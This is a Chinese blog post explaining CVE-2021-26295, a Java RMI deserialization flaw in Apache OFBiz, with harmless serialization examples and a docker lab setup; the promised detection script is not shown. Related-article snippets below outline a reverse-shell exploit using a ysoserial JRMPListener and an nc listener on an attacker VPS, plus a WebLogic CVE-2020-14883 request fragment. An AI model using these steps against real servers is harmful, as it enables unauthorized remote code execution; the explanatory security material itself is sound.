CVE-2021-26295 Apache OFBiz rmi反序列化 漏洞检测脚本

最新推荐文章于 2023-08-11 15:35:52 发布
最新推荐文章于 2023-08-11 15:35:52 发布
阅读量1k 收藏
点赞数
分类专栏: 安全 文章标签: rmi反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39811856/article/details/115238985
版权

漏洞描述:

  Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。2021年3月22日 Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞(CVE-2021-26295)。攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。

JMI解读:

Java RMI服务是远程方法调用(Remote Method Invocation)。它是一种机制,能够让在某个java虚拟机上的对象调用另一个Java虚拟机的对象的方法。

RMI传输过程必然会使用序列化和反序列化,如果RMI服务端端口对外开发,并且服务端使用了像Apache Commons Collections这类库,那么会导致远程命令执行。

漏洞分析:

咱们去看看是哪一段代码出问题了,首先看了360的通报,如下

 

接下来去看看版本跟新情况:

https://github.com/apache/ofbiz-framework/compare/release17.12.05...release17.12.06#files_bucket

上个版本,该模块代码为:

 

在Java中,一个类对象想实现序列化,需要:

  1. 该类必须实现 java.io.Serializable 对象
  2. 该类的所有属性必须是可序列化的(此处有例外)

还是通过代码来演示,我们先写一个Person类来用作序列化的内容。

class Person implements Serializable{
    private String name;
    private Integer age;

    public Person(String name, Integer age){
        this.name = name;
        this.age = age;
    }

    public void printInfo(){
        System.out.println("My name is " + this.name + ", I'm " + this.age + " years old.");
    }
}

序列化Person的对象并写入文件:

Person p = new Person("adan0s", 20);
try{
    FileOutputStream fileOut = new FileOutputStream("./person.ser");
    ObjectOutputStream  out = new ObjectOutputStream(fileOut);
    out.writeObject(p);
    out.close();
    fileOut.close();
}catch (IOException i){
    i.printStackTrace();
}

这里主要是利用ObjectOutputStream流来把对象进行包装,再使用FileOutputStream流写入文件。

下面是反序列化:

Person p = null;
try{
    FileInputStream fileIn = new FileInputStream("./person.ser");
    ObjectInputStream input = new ObjectInputStream(fileIn);
    p = (Person) input.readObject();
    input.close();
    fileIn.close();
    p.printInfo();
} catch (FileNotFoundException e) {
    e.printStackTrace();
} catch (IOException e) {
    e.printStackTrace();
} catch (ClassNotFoundException e) {
    e.printStackTrace();
}

其实就是把序列化反着来了一遍。

 

我们通过源码来查看漏洞利用条件(存在反序列化):

 

一、环境搭建

docker run -d -p 811:8080 -p 8443:8443  opensourceknight/ofbiz

直接启动Docker

然后访问811 或者https://ip/8443

 

ATOM_123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2021-26295-Apache-OFBiz:CVE-2021-26295 Apache OFBiz rmi反序列化POC
03-25
CVE-2021-26295-Apache-OFBiz CVE-2021-26295 Apache OFBiz rmi反序列化POC 需要将ysoserial.jar放置在目录下,并且不能使用java的高版本
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-26295-POC
03-25
CVE-2021-26295-POC 利用DNSlog进行CVE-2021-26295漏洞验证。 使用 将目标放于target.txt后运行python poc.py即可。(JDK环境需<12,否则ysoserial不能正常生成有效载荷) 避免学习交流,请勿用于其他用途。
Apache ofbiz RMI远程代码执行漏洞复现(CVE-2021-26295)
小小猪的博客
12-18 1897
Apache ofbiz RMI远程代码执行漏洞复现(CVE-2021-26295) 介绍: OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等,OFBiz 已经正式成为 Apache
Java安全之攻击RMI的思考
最新发布
why811的博客
08-11 282
这里,如果Java应用没有对传入的序列化数据进行安全性检查,我们可以将恶意的TransformedMap序列化后,远程提交给Java应用,如果Java应用可以触发变换,即可成功远程命令执行。结合前述Commons Collections的特性,如果某个可序列化的类重写了readObject()方法,并且在readObject()中对Map类型的变量进行了键值修改操作,并且这个Map变量是可控的,就可以实现我们的攻击目标了。例如,攻击者可以在反序列化数据中包含恶意类或利用已知的反序列化漏洞
Apache OFBiz rmi反序列化漏洞复现(CVE-2021-26295
m0_48520508的博客
04-08 874
0x00简介 Apache OFBiz全称是The ApacheOpen For Business Project。是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新的J2EE/XML规范和技术标准,构建大中型企业级、快平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz几乎实现了所有的J2EE核心设计模式,各个模块之间的耦合比较松散,用户能够比较容易的根据自己的需要进行拆卸,非常灵活。 0x01漏洞概述 2021年3月22日 Apache OFBiz官方发
CVE-2021-26295 Apache OFBiz反序列化远程代码执行漏洞复现
afei001
04-01 552
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 docker搭建漏洞环境 5.2 DNSlog验证CVE-2021-26295 5.3 CVE-2021-26295_Apache_OFBiz_POC.py 6.漏洞修复 1.漏洞概述 Apache OFBiz是一个非常著名的电子商务平台。它是用于企业流程自动化的开源产品。它包括用于ERP,CRM。构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统...
Apache OFBiz rmi反序列化漏洞CVE-2021-26295)复现
锋刃科技的博客
03-24 1262
简介 Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 影响版本 apache:ofbiz: <17.12.06 环境搭建 docker run -d -p 811:8080 -p 8443:8443 opensourceknight/ofbiz 漏洞复现 构建数据包 POST /webtools/control/SOAPService HTTP/1....
CVE-2021-26295:CVE-2021-26295 EXP可成功反弹壳牌
03-25
CVE-2021-26295 CVE-2021-26295 EXP可成功反弹壳 本文以及工具仅限于技术共享,不能用于非法用途,否则会导致一切后果自行承担。 触发命令执行EXP 1. VPS启动RMI监听9999端口 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] ' 2. VPS启动nc监听64444端口 nc -lvp 64444 3.执行python脚本 python3 cve-2021-26295_exp.py < target> < vps> < vps> 示例
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
冰蝎3.0 页面存在,但是无法获取密钥
weixin_39811856的博客
08-18 7788
下载链接:https://github.com/rebeyond/Behinder/releases 此次改版较大,更新日志: 我在尝试时PHP马时,一直都在报错: 于是我去github下查看issues 结合别人的回复,我查看自己php版本:5.7 使用docker搭建apache+php7.0 https://www.jianshu.com/p/81ad5fe91866 连接成功 ...
CVE-2020-14883验证
weixin_39811856的博客
11-10 3343
[CVE-2020-14883] Oracle WebLogic Server认证的远程代码执行(RCE) 基于windows的受攻击对象:tangosol.coherence.mvel2.sh.ShellSession() POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1 Host: vulnerablehost:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 ..
CVE-2020-8840复现
weixin_39811856的博客
07-01 2959
0x00 漏洞概述 FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。 此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。 0x01 环境搭建 搭建一个web服务器,我们采用python3 在web服务器目录放上已经编译好的恶意类 恶意文件内容为: 启动ldap服务 这...
CSRF漏洞检测与发现
weixin_39811856的博客
05-17 2607
1.首先明白什么是CSRF漏洞 跨站请求伪造,这里刚入门的同学肯定不明白是什么意思,其实重点在于请求伪造 简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。 在CSRF的攻击场景中攻击者会伪造一个请求(这个请.
实战靶场整理
weixin_39811856的博客
07-22 1967
0x00 前言 在学习渗透测试的过程中,光学理论知识是不够的,还需要结合实战来进行学习。但是国家法律是不允许我们对互联网上的web站在未授权的情况下进行渗透测试的,所以我们只能通过自己搭建环境来进行学习。下面给大家分享一些靶场,免得大家再去寻找。 0x01Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butt.
CVE-2021-45105/CVE-2021-44228
07-29
CVE-2021-45105和CVE-2021-44228是两个与Apache HTTP Server(Apache Web服务器)相关的漏洞编号。这些漏洞可能会影响Apache HTTP Server的安全性。CVE-2021-45105是一个路径遍历漏洞,攻击者可以利用它来读取服务器上受限制的文件。CVE-2021-44228是一个HTTP请求解析漏洞,攻击者可以通过发送恶意的请求导致服务器崩溃或远程代码执行。 为了保护系统安全,建议及时升级Apache HTTP Server到最新版本,并遵循相关安全建议和最佳实践。如果你是系统管理员或开发人员,可以查看Apache官方发布的安全公告,获取更详细的信息和修复方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATOM_123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值